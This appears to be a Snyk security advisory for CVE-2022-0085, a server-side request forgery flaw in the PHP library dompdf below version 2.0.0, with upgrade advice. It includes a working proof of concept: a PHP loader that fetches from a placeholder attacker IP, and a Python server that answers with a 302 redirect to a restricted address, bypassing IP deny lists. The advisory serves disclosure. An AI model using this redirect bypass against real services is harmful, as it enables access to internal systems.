Server-side Request Forgery (SSRF) Affecting dompdf/dompdf package, versions <2.0.0
Threat Intelligence
Do your applications use this vulnerable package?
In a few clicks we can analyze your entire application and see what components are vulnerable in your application, and suggest you quick fixes.
Test your applications- Snyk ID SNYK-PHP-DOMPDFDOMPDF-2936790
- published 29 Jun 2022
- disclosed 29 Jun 2022
- credit haxatron
Introduced: 29 Jun 2022
CVE-2022-0085 Open this link in a new tabHow to fix?
Upgrade dompdf/dompdf to version 2.0.0 or higher.
Overview
Affected versions of this package are vulnerable to Server-side Request Forgery (SSRF). When DomPDF is being used with isRemoteEnabled and allow_url_fopen set to true, and the IP addresses are restricted via a deny list, it is possible for an attacker to pass in a URL which bypasses this deny list but serves a 302 redirect response to a restricted IP address.
PoC:
poc.php
<?php
//URL variable
$url = "http://[ATTACKER-IP]";
require_once 'dompdf/autoload.inc.php';
use Dompdf\Dompdf;
use Dompdf\Options;
$options = new Options();
$options->set('isRemoteEnabled', true);
$dompdf = new Dompdf($options);
$host = parse_url($url, PHP_URL_HOST);
$ip = gethostbyname($host);
if ($ip !== "127.0.0.1") {
$dompdf->loadHtmlFile($url);
$dompdf->setPaper('A4', 'landscape');
$dompdf->render();
$dompdf->stream();
}
?>
redirector.py - hosted on http://[ATTACKER-IP]
import sys
from http.server import HTTPServer, BaseHTTPRequestHandler
if len(sys.argv)-1 != 2:
print("Usage: {} <port_number> <url>".format(sys.argv[0]))
sys.exit()
class Redirect(BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(302)
self.send_header('Location', sys.argv[2])
self.end_headers()
HTTPServer(("", int(sys.argv[1])), Redirect).serve_forever()